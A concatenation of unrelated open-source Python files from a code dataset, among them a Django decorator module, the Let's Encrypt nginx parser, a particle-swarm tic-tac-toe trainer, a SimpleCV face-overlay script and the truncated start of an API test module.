# worker *was* replaced (different class)
self.assertIdentical(self.workers.workers['worker1'], worker_new)
@defer.inlineCallbacks
def test_newConnection_remoteGetWorkerInfo_failure(self):
class Error(RuntimeError):
pass
conn = mock.Mock()
conn.remoteGetWorkerInfo = mock.Mock(
return_value=defer.fail(Error()))
yield self.assertFailure(
self.workers.newConnection(conn, "worker"), Error)
| gpl-2.0 |
blaze33/django | django/views/decorators/vary.py | 329 | 1197 | from functools import wraps
from django.utils.cache import patch_vary_headers
from django.utils.decorators import available_attrs
def vary_on_headers(*headers):
"""
A view decorator that adds the specified headers to the Vary header of the
response. Usage:
@vary_on_headers('Cookie', 'Accept-language')
def index(request):
...
Note that the header names are not case-sensitive.
"""
def decorator(func):
@wraps(func, assigned=available_attrs(func))
def inner_func(*args, **kwargs):
response = func(*args, **kwargs)
patch_vary_headers(response, headers)
return response
return inner_func
return decorator
def vary_on_cookie(func):
"""
A view decorator that adds "Cookie" to the Vary header of a response. This
indicates that a page's contents depends on cookies. Usage:
@vary_on_cookie
def index(request):
...
"""
@wraps(func, assigned=available_attrs(func))
def inner_func(*args, **kwargs):
response = func(*args, **kwargs)
patch_vary_headers(response, ('Cookie',))
return response
return inner_func
| bsd-3-clause |
catapult-project/catapult | systrace/profile_chrome/chrome_startup_tracing_agent_unittest.py | 6 | 1066 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
from profile_chrome import chrome_startup_tracing_agent
from systrace import decorators
from systrace.tracing_agents import agents_unittest
class ChromeAgentTest(agents_unittest.BaseAgentTest):
# TODO(washingtonp): This test seems to fail on the version of Android
# currently on the Trybot servers (KTU84P), although it works on Android M.
# Either upgrade the version of Android on the Trybot servers or determine
# if there is a way to run this agent on Android KTU84P.
@decorators.Disabled
def testTracing(self):
agent = chrome_startup_tracing_agent.ChromeStartupTracingAgent(
self.device, self.package_info,
'', # webapk_package
False, # cold
'https://www.google.com' # url
)
try:
agent.StartAgentTracing(None)
finally:
agent.StopAgentTracing()
result = agent.GetResults()
json.loads(result.raw_data)
| bsd-3-clause |
sapics/letsencrypt | letsencrypt-nginx/letsencrypt_nginx/parser.py | 26 | 16596 | """NginxParser is a member object of the NginxConfigurator class."""
import glob
import logging
import os
import pyparsing
import re
from letsencrypt import errors
from letsencrypt_nginx import obj
from letsencrypt_nginx import nginxparser
logger = logging.getLogger(__name__)
class NginxParser(object):
"""Class handles the fine details of parsing the Nginx Configuration.
:ivar str root: Normalized abosulte path to the server root
directory. Without trailing slash.
:ivar dict parsed: Mapping of file paths to parsed trees
"""
def __init__(self, root, ssl_options):
self.parsed = {}
self.root = os.path.abspath(root)
self.loc = self._set_locations(ssl_options)
# Parse nginx.conf and included files.
# TODO: Check sites-available/ as well. For now, the configurator does
# not enable sites from there.
self.load()
def load(self):
"""Loads Nginx files into a parsed tree.
"""
self.parsed = {}
self._parse_recursively(self.loc["root"])
def _parse_recursively(self, filepath):
"""Parses nginx config files recursively by looking at 'include'
directives inside 'http' and 'server' blocks. Note that this only
reads Nginx files that potentially declare a virtual host.
:param str filepath: The path to the files to parse, as a glob
"""
filepath = self.abs_path(filepath)
trees = self._parse_files(filepath)
for tree in trees:
for entry in tree:
if _is_include_directive(entry):
# Parse the top-level included file
self._parse_recursively(entry[1])
elif entry[0] == ['http'] or entry[0] == ['server']:
# Look for includes in the top-level 'http'/'server' context
for subentry in entry[1]:
if _is_include_directive(subentry):
self._parse_recursively(subentry[1])
elif entry[0] == ['http'] and subentry[0] == ['server']:
# Look for includes in a 'server' context within
# an 'http' context
for server_entry in subentry[1]:
if _is_include_directive(server_entry):
self._parse_recursively(server_entry[1])
def abs_path(self, path):
"""Converts a relative path to an absolute path relative to the root.
Does nothing for paths that are already absolute.
:param str path: The path
:returns: The absolute path
:rtype: str
"""
if not os.path.isabs(path):
return os.path.join(self.root, path)
else:
return path
def get_vhosts(self):
# pylint: disable=cell-var-from-loop
"""Gets list of all 'virtual hosts' found in Nginx configuration.
Technically this is a misnomer because Nginx does not have virtual
hosts, it has 'server blocks'.
:returns: List of :class:`~letsencrypt_nginx.obj.VirtualHost`
objects found in configuration
:rtype: list
"""
enabled = True # We only look at enabled vhosts for now
vhosts = []
servers = {}
for filename in self.parsed:
tree = self.parsed[filename]
servers[filename] = []
srv = servers[filename] # workaround undefined loop var in lambdas
# Find all the server blocks
_do_for_subarray(tree, lambda x: x[0] == ['server'],
lambda x: srv.append(x[1]))
# Find 'include' statements in server blocks and append their trees
for i, server in enumerate(servers[filename]):
new_server = self._get_included_directives(server)
servers[filename][i] = new_server
for filename in servers:
for server in servers[filename]:
# Parse the server block into a VirtualHost object
parsed_server = _parse_server(server)
vhost = obj.VirtualHost(filename,
parsed_server['addrs'],
parsed_server['ssl'],
enabled,
parsed_server['names'],
server)
vhosts.append(vhost)
return vhosts
def _get_included_directives(self, block):
"""Returns array with the "include" directives expanded out by
concatenating the contents of the included file to the block.
:param list block:
:rtype: list
"""
result = list(block) # Copy the list to keep self.parsed idempotent
for directive in block:
if _is_include_directive(directive):
included_files = glob.glob(
self.abs_path(directive[1]))
for incl in included_files:
try:
result.extend(self.parsed[incl])
except KeyError:
pass
return result
def _parse_files(self, filepath, override=False):
"""Parse files from a glob
:param str filepath: Nginx config file path
:param bool override: Whether to parse a file that has been parsed
:returns: list of parsed tree structures
:rtype: list
"""
files = glob.glob(filepath)
trees = []
for item in files:
if item in self.parsed and not override:
continue
try:
with open(item) as _file:
parsed = nginxparser.load(_file)
self.parsed[item] = parsed
trees.append(parsed)
except IOError:
logger.warn("Could not open file: %s", item)
except pyparsing.ParseException:
logger.debug("Could not parse file: %s", item)
return trees
def _set_locations(self, ssl_options):
"""Set default location for directives.
Locations are given as file_paths
.. todo:: Make sure that files are included
"""
root = self._find_config_root()
default = root
nginx_temp = os.path.join(self.root, "nginx_ports.conf")
if os.path.isfile(nginx_temp):
listen = nginx_temp
name = nginx_temp
else:
listen = default
name = default
return {"root": root, "default": default, "listen": listen,
"name": name, "ssl_options": ssl_options}
def _find_config_root(self):
"""Find the Nginx Configuration Root file."""
location = ['nginx.conf']
for name in location:
if os.path.isfile(os.path.join(self.root, name)):
return os.path.join(self.root, name)
raise errors.NoInstallationError(
"Could not find configuration root")
def filedump(self, ext='tmp'):
"""Dumps parsed configurations into files.
:param str ext: The file extension to use for the dumped files. If
empty, this overrides the existing conf files.
"""
for filename in self.parsed:
tree = self.parsed[filename]
if ext:
filename = filename + os.path.extsep + ext
try:
with open(filename, 'w') as _file:
nginxparser.dump(tree, _file)
except IOError:
logger.error("Could not open file for writing: %s", filename)
def _has_server_names(self, entry, names):
"""Checks if a server block has the given set of server_names. This
is the primary way of identifying server blocks in the configurator.
Returns false if 'entry' doesn't look like a server block at all.
..todo :: Doesn't match server blocks whose server_name directives are
split across multiple conf files.
:param list entry: The block to search
:param set names: The names to match
:rtype: bool
"""
if len(names) == 0:
# Nothing to identify blocks with
return False
if not isinstance(entry, list):
# Can't be a server block
return False
new_entry = self._get_included_directives(entry)
server_names = set()
for item in new_entry:
if not isinstance(item, list):
# Can't be a server block
return False
if item[0] == 'server_name':
server_names.update(_get_servernames(item[1]))
return server_names == names
def add_server_directives(self, filename, names, directives,
replace=False):
"""Add or replace directives in the first server block with names.
..note :: If replace is True, this raises a misconfiguration error
if the directive does not already exist.
..todo :: Doesn't match server blocks whose server_name directives are
split across multiple conf files.
:param str filename: The absolute filename of the config file
:param set names: The server_name to match
:param list directives: The directives to add
:param bool replace: Whether to only replace existing directives
"""
_do_for_subarray(self.parsed[filename],
lambda x: self._has_server_names(x, names),
lambda x: _add_directives(x, directives, replace))
def add_http_directives(self, filename, directives):
"""Adds directives to the first encountered HTTP block in filename.
:param str filename: The absolute filename of the config file
:param list directives: The directives to add
"""
_do_for_subarray(self.parsed[filename],
lambda x: x[0] == ['http'],
lambda x: _add_directives(x[1], [directives], False))
def get_all_certs_keys(self):
"""Gets all certs and keys in the nginx config.
:returns: list of tuples with form [(cert, key, path)]
cert - str path to certificate file
key - str path to associated key file
path - File path to configuration file.
:rtype: set
"""
c_k = set()
vhosts = self.get_vhosts()
for vhost in vhosts:
tup = [None, None, vhost.filep]
if vhost.ssl:
for directive in vhost.raw:
if directive[0] == 'ssl_certificate':
tup[0] = directive[1]
elif directive[0] == 'ssl_certificate_key':
tup[1] = directive[1]
if tup[0] is not None and tup[1] is not None:
c_k.add(tuple(tup))
return c_k
def _do_for_subarray(entry, condition, func):
"""Executes a function for a subarray of a nested array if it matches
the given condition.
:param list entry: The list to iterate over
:param function condition: Returns true iff func should be executed on item
:param function func: The function to call for each matching item
"""
if isinstance(entry, list):
if condition(entry):
func(entry)
else:
for item in entry:
_do_for_subarray(item, condition, func)
def get_best_match(target_name, names):
"""Finds the best match for target_name out of names using the Nginx
name-matching rules (exact > longest wildcard starting with * >
longest wildcard ending with * > regex).
:param str target_name: The name to match
:param set names: The candidate server names
:returns: Tuple of (type of match, the name that matched)
:rtype: tuple
"""
exact = []
wildcard_start = []
wildcard_end = []
regex = []
for name in names:
if _exact_match(target_name, name):
exact.append(name)
elif _wildcard_match(target_name, name, True):
wildcard_start.append(name)
elif _wildcard_match(target_name, name, False):
wildcard_end.append(name)
elif _regex_match(target_name, name):
regex.append(name)
if len(exact) > 0:
# There can be more than one exact match; e.g. eff.org, .eff.org
match = min(exact, key=len)
return ('exact', match)
if len(wildcard_start) > 0:
# Return the longest wildcard
match = max(wildcard_start, key=len)
return ('wildcard_start', match)
if len(wildcard_end) > 0:
# Return the longest wildcard
match = max(wildcard_end, key=len)
return ('wildcard_end', match)
if len(regex) > 0:
# Just return the first one for now
match = regex[0]
return ('regex', match)
return (None, None)
def _exact_match(target_name, name):
return target_name == name or '.' + target_name == name
def _wildcard_match(target_name, name, start):
# Degenerate case
if name == '*':
return True
parts = target_name.split('.')
match_parts = name.split('.')
# If the domain ends in a wildcard, do the match procedure in reverse
if not start:
parts.reverse()
match_parts.reverse()
# The first part must be a wildcard or blank, e.g. '.eff.org'
first = match_parts.pop(0)
if first != '*' and first != '':
return False
target_name = '.'.join(parts)
name = '.'.join(match_parts)
# Ex: www.eff.org matches *.eff.org, eff.org does not match *.eff.org
return target_name.endswith('.' + name)
def _regex_match(target_name, name):
# Must start with a tilde
if len(name) < 2 or name[0] != '~':
return False
# After tilde is a perl-compatible regex
try:
regex = re.compile(name[1:])
if re.match(regex, target_name):
return True
else:
return False
except re.error:
# perl-compatible regexes are sometimes not recognized by python
return False
def _is_include_directive(entry):
"""Checks if an nginx parsed entry is an 'include' directive.
:param list entry: the parsed entry
:returns: Whether it's an 'include' directive
:rtype: bool
"""
return (isinstance(entry, list) and
entry[0] == 'include' and len(entry) == 2 and
isinstance(entry[1], str))
def _get_servernames(names):
"""Turns a server_name string into a list of server names
:param str names: server names
:rtype: list
"""
whitespace_re = re.compile(r'\s+')
names = re.sub(whitespace_re, ' ', names)
return names.split(' ')
def _parse_server(server):
"""Parses a list of server directives.
:param list server: list of directives in a server block
:rtype: dict
"""
parsed_server = {}
parsed_server['addrs'] = set()
parsed_server['ssl'] = False
parsed_server['names'] = set()
for directive in server:
if directive[0] == 'listen':
addr = obj.Addr.fromstring(directive[1])
parsed_server['addrs'].add(addr)
if not parsed_server['ssl'] and addr.ssl:
parsed_server['ssl'] = True
elif directive[0] == 'server_name':
parsed_server['names'].update(
_get_servernames(directive[1]))
return parsed_server
def _add_directives(block, directives, replace=False):
"""Adds or replaces directives in a block. If the directive doesn't exist in
the entry already, raises a misconfiguration error.
..todo :: Find directives that are in included files.
:param list block: The block to replace in
:param list directives: The new directives.
"""
if replace:
for directive in directives:
changed = False
if len(directive) == 0:
continue
for index, line in enumerate(block):
if len(line) > 0 and line[0] == directive[0]:
block[index] = directive
changed = True
if not changed:
raise errors.MisconfigurationError(
'LetsEncrypt expected directive for %s in the Nginx '
'config but did not find it.' % directive[0])
else:
block.extend(directives)
| apache-2.0 |
geometalab/osmaxx-frontend | osmaxx/excerptexport/migrations/0033_add_countries_as_public_excerpts_20160518_1401.py | 2 | 2038 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-18 12:01
from __future__ import unicode_literals
import os
from django.db import migrations
def get_polyfile_name_to_file_mapping():
from osmaxx.excerptexport._settings import POLYFILE_LOCATION
from osmaxx.utils.polyfile_helpers import _is_polyfile
filenames = os.listdir(POLYFILE_LOCATION)
return {
_extract_country_name_from_polyfile_name(filename): filename
for filename in filenames if _is_polyfile(filename)
}
def _extract_country_name_from_polyfile_name(filename):
from osmaxx.utils.polyfile_helpers import POLYFILE_FILENAME_EXTENSION
name, _ = filename.split(POLYFILE_FILENAME_EXTENSION)
return name
def import_countries(apps, schema_editor): # noqa
from osmaxx.utils.polyfile_helpers import polyfile_to_geos_geometry
Excerpt = apps.get_model("excerptexport", "Excerpt") # noqa
ExtractionOrder = apps.get_model("excerptexport", "ExtractionOrder") # noqa
for name, polyfile_path in get_polyfile_name_to_file_mapping().items():
geometry = polyfile_to_geos_geometry(polyfile_path)
excerpt = Excerpt.objects.create(
is_public=True,
name=name,
bounding_geometry=geometry,
excerpt_type='country',
)
for extraction_order in ExtractionOrder.objects.filter(excerpt__name=name):
extraction_order.excerpt = excerpt
extraction_order.save()
def remove_countries(apps, schema_editor): # noqa
Excerpt = apps.get_model("excerptexport", "Excerpt") # noqa
ExtractionOrder = apps.get_model("excerptexport", "ExtractionOrder") # noqa
existing_extraction_orders = ExtractionOrder.objects.all()
Excerpt.objects.exclude(extraction_orders__in=existing_extraction_orders).delete()
class Migration(migrations.Migration):
dependencies = [
('excerptexport', '0032_allow_user_None'),
]
operations = [
migrations.RunPython(import_countries, remove_countries),
]
| mit |
meithan/tictactoe | SwarmTrainer.py | 1 | 5058 | # Trains a neural network to play tic-tac-toe using Particle
# Swarm Optimization
import random
import numpy as np
from NeuralNetwork import NeuralNetwork
from NNPlayer import NNPlayer
from trials import evaluate_player
# ==================================
# PSO global constants
xi = 0.72984
c1 = 2.05
c2 = 2.05
# The particles, yo
# Note that fitness calculation has been outsourced to the trainer class
# so that it can be computed in parallel
class Particle:
def __init__(self, pos=None, vel=None):
if pos is None:
self.pos = None
else:
self.pos = np.copy(pos)
if vel is None:
self.vel = None
else:
self.vel = np.copy(vel)
self.fitness = None
self.neighbors = None
self.best_pos = None
self.best_fit = None
# Update the particle velocity
# Assumes fitness of all particles has been computed
def update_vel(self):
# Obtain best pos of neighbors
best_npos = None
best_nfit = None
for neigh in self.neighbors:
if best_npos is None or neigh.fitness > best_nfit:
best_nfit = neigh.fitness
best_npos = neigh.pos
# The update
e1 = np.random.random(self.vel.shape)
e2 = np.random.random(self.vel.shape)
self.vel = \
xi * ( \
self.vel \
+ c1 * e1 * (self.best_pos - self.pos) \
+ c2 * e2 * (best_npos - self.pos) \
)
# Moves the particle (only)
# Assumes velocity is updated
def move(self):
self.pos = self.pos + self.vel
# Updates the best position the particle has seen so far
# Assumes fitness for the current position has been calculated
def update_best_pos(self):
if self.best_pos is None or self.fitness > self.best_fit:
self.best_fit = self.fitness
self.best_pos = self.pos
# Receives a NNagent and uses the PSO algorithm to train it
class PSOTrainer:
# num_steps is the number of steps of the PSO
# num_parts is the number of particles to use
# num_neighs is the number of neighbors each particle has
# num_games is the number of games used to determine the win ratio
def __init__(self, num_steps=1000, num_parts=100, num_neighs=5, num_games=100000):
self.num_steps = num_steps
self.num_parts = num_parts
self.num_games = num_games
self.num_neighs = num_neighs
self.particles = []
# Evaluates the fitness of the particle
def eval_fitness(self, particle):
NN = NeuralNetwork(L=3, Ns=[9,9,9])
NN.load_serialized(particle.pos)
player = NNPlayer(NN=NN)
results = evaluate_player(player, self.num_games)
strength = results[0]
# Hack to prevent weight explosion
# if np.sum(np.abs(NN.weights[0])) > 1800 or np.sum(np.abs(NN.weights[1])) > 1800:
# strength = 0
return strength
# The actual training routine
def train(self):
# Create particles (with random NNs)
print("Creating particles ...")
for i in range(self.num_parts):
p = Particle()
NN = NeuralNetwork(L=3, Ns=[9,9,9])
NN.randomize()
p.pos = NN.serialize()
#p.vel = np.random.rand(len(p.pos))
p.vel = np.zeros(len(p.pos))
self.particles.append(p)
# Randomly set neighbors
print("Setting neighbors ...")
for i in range(self.num_parts):
particle = self.particles[i]
particle.neighbors = []
while len(particle.neighbors) < self.num_neighs:
neigh = random.choice(self.particles)
if neigh is not particle:
particle.neighbors.append(neigh)
# Evaluate initial fitness
print("Initializing ...")
fits = []
for i,particle in enumerate(self.particles):
particle.fitness = self.eval_fitness(particle)
particle.update_best_pos()
fits.append(particle.fitness)
print("Max fitness: %.5f" % max(fits))
print("Avg fitness: %.5f" % np.mean(fits))
print("Min fitness: %.5f" % min(fits))
print("Std fitness: %.5f" % np.std(fits))
# Main loop
print("\nTRAINING ...")
for step in range(1,self.num_steps+1):
print("\nStep %i" % step)
for i,particle in enumerate(self.particles):
particle.update_vel()
particle.move()
particle.fitness = self.eval_fitness(particle)
particle.update_best_pos()
if i % 1 == 0:
print("=", end="", flush=True)
print()
best_part = None
best_fit = None
fits = []
for particle in self.particles:
fits.append(particle.fitness)
if best_fit is None or particle.fitness > best_fit:
best_fit = particle.fitness
best_part = particle
print("Max fitness: %.5f" % max(fits))
print("Avg fitness: %.5f" % np.mean(fits))
print("Min fitness: %.5f" % min(fits))
print("Std fitness: %.5f" % np.std(fits))
outfname = "swarm_%03i.nn" % step
NN = NeuralNetwork(L=3, Ns=[9,9,9])
NN.load_serialized(best_part.pos)
NN.save_to_file(outfname)
print("Saved best to %s" % outfname)
# ============================================
trainer = PSOTrainer(num_parts=50, num_games=1000)
trainer.train()
| gpl-3.0 |
akaariai/django | tests/model_options/test_default_related_name.py | 308 | 1645 | from django.test import TestCase
from .models.default_related_name import Author, Book, Editor
class DefaultRelatedNameTests(TestCase):
def setUp(self):
self.author = Author.objects.create(first_name="Dave", last_name="Loper")
self.editor = Editor.objects.create(name="Test Editions",
bestselling_author=self.author)
self.book = Book.objects.create(title="Test Book", editor=self.editor)
self.book.authors.add(self.author)
self.book.save()
def test_no_default_related_name(self):
try:
self.author.editor_set
except AttributeError:
self.fail("Author should have an editor_set relation.")
def test_default_related_name(self):
try:
self.author.books
except AttributeError:
self.fail("Author should have a books relation.")
def test_related_name_overrides_default_related_name(self):
try:
self.editor.edited_books
except AttributeError:
self.fail("Editor should have a edited_books relation.")
def test_inheritance(self):
try:
# Here model_options corresponds to the name of the application used
# in this test
self.book.model_options_bookstores
except AttributeError:
self.fail("Book should have a model_options_bookstores relation.")
def test_inheritance_with_overrided_default_related_name(self):
try:
self.book.editor_stores
except AttributeError:
self.fail("Book should have a editor_stores relation.")
| bsd-3-clause |
shedskin/shedskin | examples/adatron.py | 6 | 6315 | #!/usr/bin/env python
# Adatron SVM with polynomial kernel
# placed in the public domain by Stavros Korokithakis
import sys
from math import exp
CYTOSOLIC = 0
EXTRACELLULAR = 1
NUCLEAR = 2
MITOCHONDRIAL = 3
BLIND = 4
D = 5.0
LENGTH = 50
PROTEINS = []
AMINOACIDS = "ACDEFGHIKLMNPQRSTVWY"
class Protein:
def __init__(self, name, mass, isoelectric_point, size, sequence, type):
self.name = name
self.mass = mass
self.isoelectric_point = isoelectric_point
self.size = size
self.sequence = sequence
self.type = type
self.extract_composition()
def extract_composition(self):
self.local_composition = dict(((x, 0.0) for x in AMINOACIDS))
for counter in range(LENGTH):
self.local_composition[self.sequence[counter]] += 1.0 / LENGTH
self.global_composition = dict(((x, 0.0) for x in AMINOACIDS))
for aminoacid in self.sequence:
self.global_composition[aminoacid] += 1.0 / len(self.sequence)
def create_vector(self):
vector = []
for key, value in sorted(self.local_composition.items()):
vector.append(value)
for key in sorted(self.global_composition.keys()):
vector.append(value)
return vector
def load_file(filename, type):
global PROTEINS
protfile = open(filename)
for line in protfile:
if line.startswith("name"):
continue
name, mass, isoelectric_point, size, sequence = line.strip().split("\t")
protein = Protein(name, mass, isoelectric_point, size, sequence, type)
PROTEINS.append(protein)
protfile.close()
def create_tables():
"""Create the feature and label tables."""
feature_table = []
label_table = []
for protein in PROTEINS:
feature_table.append(protein.create_vector())
for protein in PROTEINS:
if protein.type == BLIND:
continue
labels = [-1] * 4
# Invert the sign of the label our protein belongs to.
labels[protein.type] *= -1
label_table.append(labels)
return feature_table, label_table
def create_kernel_table(feature_table):
kernel_table = []
for row in feature_table:
kernel_row = []
for candidate in feature_table:
difference = 0.0
for counter in range(len(row)):
difference += (row[counter] - candidate[counter]) ** 2
kernel_row.append(exp(-D*difference))
kernel_table.append(kernel_row)
return kernel_table
def train_adatron(kernel_table, label_table, h, c):
tolerance = 0.5
alphas = [([0.0] * len(kernel_table)) for _ in range(len(label_table[0]))]
betas = [([0.0] * len(kernel_table)) for _ in range(len(label_table[0]))]
bias = [0.0] * len(label_table[0])
labelalphas = [0.0] * len(kernel_table)
max_differences = [(0.0, 0)] * len(label_table[0])
for iteration in range(10*len(kernel_table)):
print "Starting iteration %s..." % iteration
if iteration == 20: # XXX shedskin test
return alphas, bias
for klass in range(len(label_table[0])):
max_differences[klass] = (0.0, 0)
for elem in range(len(kernel_table)):
labelalphas[elem] = label_table[elem][klass] * alphas[klass][elem]
for col_counter in range(len(kernel_table)):
prediction = 0.0
for row_counter in range(len(kernel_table)):
prediction += kernel_table[col_counter][row_counter] * \
labelalphas[row_counter]
g = 1.0 - ((prediction + bias[klass]) * label_table[col_counter][klass])
betas[klass][col_counter] = min(max((alphas[klass][col_counter] + h * g), 0.0), c)
difference = abs(alphas[klass][col_counter] - betas[klass][col_counter])
if difference > max_differences[klass][0]:
max_differences[klass] = (difference, col_counter)
if all([max_difference[0] < tolerance for max_difference in max_differences]):
return alphas, bias
else:
alphas[klass][max_differences[klass][1]] = betas[klass][max_differences[klass][1]]
element_sum = 0.0
for element_counter in range(len(kernel_table)):
element_sum += label_table[element_counter][klass] * alphas[klass][element_counter] / 4
bias[klass] = bias[klass] + element_sum
def calculate_error(alphas, bias, kernel_table, label_table):
prediction = 0.0
predictions = [([0.0] * len(kernel_table)) for _ in range(len(label_table[0]))]
for klass in range(len(label_table[0])):
for col_counter in range(len(kernel_table)):
for row_counter in range(len(kernel_table)):
prediction += kernel_table[col_counter][row_counter] * \
label_table[row_counter][klass] * alphas[klass][row_counter]
predictions[klass][col_counter] = prediction + bias[klass]
for col_counter in range(len(kernel_table)):
current_predictions = []
error = 0
for row_counter in range(len(label_table[0])):
current_predictions.append(predictions[row_counter][col_counter])
predicted_class = current_predictions.index(max(current_predictions))
if label_table[col_counter][predicted_class] < 0:
error += 1
return 1.0 * error / len(kernel_table)
def main():
for filename, type in [("testdata/c.txt", CYTOSOLIC), ("testdata/e.txt", EXTRACELLULAR), ("testdata/n.txt", NUCLEAR), ("testdata/m.txt", MITOCHONDRIAL)]:#, ("b.txt", BLIND)]:
load_file(filename, type)
print "Creating feature tables..."
feature_table, label_table = create_tables()
#import pickle
#print "Loading kernel table..."
#kernel_file = file("kernel_table.txt")
#kernel_table = pickle.load(kernel_file)
#kernel_file.close()
print "Creating kernel table..."
kernel_table = create_kernel_table(feature_table)
print "Training SVM..."
alphas, bias = train_adatron(kernel_table, label_table, 1.0, 3.0)
print calculate_error(alphas, bias, kernel_table, label_table)
if __name__ == "__main__":
main()
| gpl-3.0 |
vdt/SimpleCV | SimpleCV/examples/manipulation/mustachinator.py | 13 | 1439 | #!/usr/bin/python
from operator import add
from SimpleCV import *
cam = Camera()
display = Display((800,600))
counter = 0
# load the cascades
face_cascade = HaarCascade("face")
nose_cascade = HaarCascade("nose")
stache = Image("stache.png", sample=True) # load the stache
mask = stache.createAlphaMask() # load the stache mask
count = 0
while display.isNotDone():
img = cam.getImage()
img = img.scale(.5) #use a smaller image
faces = img.findHaarFeatures(face_cascade) #find faces
if( faces is not None ): # if we have a face
faces = faces.sortArea() #get the biggest one
face = faces[-1]
myFace = face.crop() # get the face image
noses = myFace.findHaarFeatures(nose_cascade) #find the nose
if( noses is not None ):# if we have a nose
noses = noses.sortArea()
nose = noses[0] # get the biggest
# these get the upper left corner of the face/nose with respect to original image
xf = face.x -(face.width()/2)
yf = face.y -(face.height()/2)
xm = nose.x -(nose.width()/2)
ym = nose.y -(nose.height()/2)
#calculate the mustache position
xmust = xf+xm-(stache.width/2)+(nose.width()/2)
ymust = yf+ym+(2*nose.height()/3)
#blit the stache/mask onto the image
img = img.blit(stache,pos=(xmust,ymust),mask = mask)
img.save(display) #display
| bsd-3-clause |
ArneBab/pypyjs | website/demo/home/rfk/repos/pypy/lib-python/2.7/email/parser.py | 392 | 3300 | # Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw, Thomas Wouters, Anthony Baxter
# Contact: [email protected]
"""A parser of RFC 2822 and MIME email messages."""
__all__ = ['Parser', 'HeaderParser']
import warnings
from cStringIO import StringIO
from email.feedparser import FeedParser
from email.message import Message
class Parser:
def __init__(self, *args, **kws):
"""Parser of RFC 2822 and MIME email messages.
Creates an in-memory object tree representing the email message, which
can then be manipulated and turned over to a Generator to return the
textual representation of the message.
The string must be formatted as a block of RFC 2822 headers and header
continuation lines, optionally preceeded by a `Unix-from' header. The
header block is terminated either by the end of the string or by a
blank line.
_class is the class to instantiate for new message objects when they
must be created. This class must have a constructor that can take
zero arguments. Default is Message.Message.
"""
if len(args) >= 1:
if '_class' in kws:
raise TypeError("Multiple values for keyword arg '_class'")
kws['_class'] = args[0]
if len(args) == 2:
if 'strict' in kws:
raise TypeError("Multiple values for keyword arg 'strict'")
kws['strict'] = args[1]
if len(args) > 2:
raise TypeError('Too many arguments')
if '_class' in kws:
self._class = kws['_class']
del kws['_class']
else:
self._class = Message
if 'strict' in kws:
warnings.warn("'strict' argument is deprecated (and ignored)",
DeprecationWarning, 2)
del kws['strict']
if kws:
raise TypeError('Unexpected keyword arguments')
def parse(self, fp, headersonly=False):
"""Create a message structure from the data in a file.
Reads all the data from the file and returns the root of the message
structure. Optional headersonly is a flag specifying whether to stop
parsing after reading the headers or not. The default is False,
meaning it parses the entire contents of the file.
"""
feedparser = FeedParser(self._class)
if headersonly:
feedparser._set_headersonly()
while True:
data = fp.read(8192)
if not data:
break
feedparser.feed(data)
return feedparser.close()
def parsestr(self, text, headersonly=False):
"""Create a message structure from a string.
Returns the root of the message structure. Optional headersonly is a
flag specifying whether to stop parsing after reading the headers or
not. The default is False, meaning it parses the entire contents of
the file.
"""
return self.parse(StringIO(text), headersonly=headersonly)
class HeaderParser(Parser):
def parse(self, fp, headersonly=True):
return Parser.parse(self, fp, True)
def parsestr(self, text, headersonly=True):
return Parser.parsestr(self, text, True)
| mit |
RAMSProject/rams | uber/tests/test_api.py | 1 | 16626 | import pytest
from cherrypy import HTTPError
from uber.common import *
from uber.tests.conftest import csrf_token, cp_session
from uber.api import auth_by_token, auth_by_session, api_auth, all_api_auth
VALID_API_TOKEN = '39074db3-9295-447a-b831-8cbaa93a0522'
@pytest.fixture()
def session():
with Session() as session:
yield session
@pytest.fixture()
def admin_account(monkeypatch, session):
admin_account = AdminAccount(attendee=Attendee())
session.add(admin_account)
session.commit()
session.refresh(admin_account)
monkeypatch.setitem(cherrypy.session, 'account_id', admin_account.id)
yield admin_account
cherrypy.session['account_id'] = None
session.delete(admin_account)
@pytest.fixture()
def api_token(session, admin_account):
api_token = ApiToken(
admin_account=admin_account,
token=VALID_API_TOKEN)
session.add(api_token)
session.commit()
session.refresh(api_token)
yield api_token
session.delete(api_token)
class TestCheckAdminAccount(object):
ACCESS_ERR = 'You do not have permission to change that access setting'
TEST_ACCESS_CHANGES = [
([], [], None),
([], [c.ADMIN], ACCESS_ERR),
([], [c.ACCOUNTS], ACCESS_ERR),
([], [c.PEOPLE], ACCESS_ERR),
([], [c.ADMIN, c.PEOPLE], ACCESS_ERR),
([], [c.ADMIN, c.ACCOUNTS], ACCESS_ERR),
([], [c.ADMIN, c.ACCOUNTS, c.PEOPLE], ACCESS_ERR),
([], [c.ACCOUNTS, c.PEOPLE], ACCESS_ERR),
([c.ADMIN], [], None),
([c.ADMIN], [c.ADMIN], None),
([c.ADMIN], [c.ACCOUNTS], None),
([c.ADMIN], [c.PEOPLE], None),
([c.ADMIN], [c.ADMIN, c.PEOPLE], None),
([c.ADMIN], [c.ADMIN, c.ACCOUNTS], None),
([c.ADMIN], [c.ADMIN, c.ACCOUNTS, c.PEOPLE], None),
([c.ADMIN], [c.ACCOUNTS, c.PEOPLE], None),
([c.ACCOUNTS], [], None),
([c.ACCOUNTS], [c.ADMIN], ACCESS_ERR),
([c.ACCOUNTS], [c.ACCOUNTS], None),
([c.ACCOUNTS], [c.PEOPLE], None),
([c.ACCOUNTS], [c.ADMIN, c.PEOPLE], ACCESS_ERR),
([c.ACCOUNTS], [c.ADMIN, c.ACCOUNTS], ACCESS_ERR),
([c.ACCOUNTS], [c.ADMIN, c.ACCOUNTS, c.PEOPLE], ACCESS_ERR),
([c.ACCOUNTS], [c.ACCOUNTS, c.PEOPLE], None),
([c.PEOPLE], [], None),
([c.PEOPLE], [c.ADMIN], ACCESS_ERR),
([c.PEOPLE], [c.ACCOUNTS], ACCESS_ERR),
([c.PEOPLE], [c.PEOPLE], None),
([c.PEOPLE], [c.ADMIN, c.PEOPLE], ACCESS_ERR),
([c.PEOPLE], [c.ADMIN, c.ACCOUNTS], ACCESS_ERR),
([c.PEOPLE], [c.ADMIN, c.ACCOUNTS, c.PEOPLE], ACCESS_ERR),
([c.PEOPLE], [c.ACCOUNTS, c.PEOPLE], ACCESS_ERR),
([c.ADMIN, c.PEOPLE], [], None),
([c.ADMIN, c.PEOPLE], [c.ADMIN], None),
([c.ADMIN, c.PEOPLE], [c.ACCOUNTS], None),
